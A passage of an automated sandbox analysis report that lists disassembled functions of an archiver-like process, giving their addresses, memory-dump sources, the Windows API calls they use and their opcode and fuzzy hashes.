                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E881C521F0E692E4EB729B11D2502BD23A1AF51784F4480B7DE8D876C6DF2DAC97C790
                                                                                                                                                                                                                                        Function 00007FF6AA1E65BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                        • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                        • Instruction ID: f96b8c910bdf23134e73637c7d7694e6e8cb06ce7a0a1bcd6ef186cdb20e451b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D21B632A29782D1EB718B259490139A755FB5AB74FA81377DA7E46BD4CE38DC83C300
                                                                                                                                                                                                                                        Function 00007FF6AA1CB9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                        • String ID: CreateThread failed
                                                                                                                                                                                                                                        • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                        • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                        • Instruction ID: 2af3ee0e3225a0bd60c526d00dd9bac403028449397f8032f5ed86b84025c62b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6111603190AA42E2E706DF11E9801B97360FF84B84F584077D69D83659EF3DE957C740
                                                                                                                                                                                                                                        Function 00007FF6AA1CBB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3094578987-0
                                                                                                                                                                                                                                        • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                        • Instruction ID: bcdf6cb950674617f9b8f436a5b02b0123b9a6fe03a8bf8739e31c22c9e13b29
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBF0A22660DA82D2EB619F22E58017C6360FF88B99F040172DE8D86269DE2CED06CB00
                                                                                                                                                                                                                                        Function 00007FF6AA197B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4141822043-0
                                                                                                                                                                                                                                        • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                        • Instruction ID: 01d8cb0c9c64001e91848d9abbd9f35ff921b4c2016e4958452776322702041f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E08C28E06642E2EA994721A86523803919F49B80F4410BADC0FCA750EE2C9D86C300
                                                                                                                                                                                                                                        Function 00007FF6AA1E2488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                        • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                        • Instruction ID: e6803f71c1e06333793cf2ecbf22cdb30396aa77f82ca88ac128c8a425326f65
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20E01A24A0A745E2FEA9AB219C9137923926F85741F0454BECC0E87792DE3DAC0A8250
                                                                                                                                                                                                                                        Function 00007FF6AA1A4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4052775200-0
                                                                                                                                                                                                                                        • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                        • Instruction ID: d18e275cb564a70474bc61536ab3785c6f7794aad52b38582136b3d3eaf3c325
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBE1B332B1A682E5EB628B24D4001BD67A2FB51794F444173DB9E87AD9DF7CE84BC700
                                                                                                                                                                                                                                        Function 00007FF6AA1A1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6AA197EBE,00000000,00000000,00000000,00000000,00000007,00007FF6AA197C48), ref: 00007FF6AA1A1B8D
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6AA197EBE,00000000,00000000,00000000,00000000,00000007,00007FF6AA197C48), ref: 00007FF6AA1A1BD7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                        • Instruction ID: 242f43dbb06d9c030363fd4ba4a306974e4dac9ef66bc3b7f47b66736fbcd015
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4311473A19681C6E7719F20D4053A926A0EB40BB8F108376DE6C866C5EF7CDC8AC700
                                                                                                                                                                                                                                        Function 00007FF6AA18681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 932687459-0
                                                                                                                                                                                                                                        • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                        • Instruction ID: 19b9232294b523c47c1fb6d45618ee55657f9a1e8a59826cdb9a3562ce12832b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0217353A09F85D2EB018F29D5510B86360FB9CB88F18A361DF9D42656EF28E5E68300
                                                                                                                                                                                                                                        Function 00007FF6AA1B915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 69db96ca1da17c6a2eb1160e9404b7f872c8654a3bd96e1949819b6dda332cdc
                                                                                                                                                                                                                                        • Instruction ID: 6e299348e1875e78e08927da8cc22ceaff3e807fbce7993ae35a1cf52cf8e099
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69db96ca1da17c6a2eb1160e9404b7f872c8654a3bd96e1949819b6dda332cdc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53119331A0AB81D1EA02EB64A5043A9B3E4EF84790F180676D6AD877E6DF7CD853C310
                                                                                                                                                                                                                                        Function 00007FF6AA1A20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                        • Instruction ID: ae148f8345028d475a9abff7dcd49ddd4f0dfcc951cbafa929569f0af3df9217
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C401E535B1E691D2EAA54B26A5004296262EF44BF0F145272DE2D83BE4DF3CEC468700
                                                                                                                                                                                                                                        Function 00007FF6AA197A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • setbuf.LIBCMT ref: 00007FF6AA197A7B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1E2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E7EF3
                                                                                                                                                                                                                                        • setbuf.LIBCMT ref: 00007FF6AA197A8F
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA197B44: GetStdHandle.KERNEL32(?,?,?,00007FF6AA197A9E), ref: 00007FF6AA197B4A
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA197B44: GetFileType.KERNELBASE(?,?,?,00007FF6AA197A9E), ref: 00007FF6AA197B56
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA197B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6AA197A9E), ref: 00007FF6AA197B69
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1E2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E2AD0
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1E2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E2C1C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
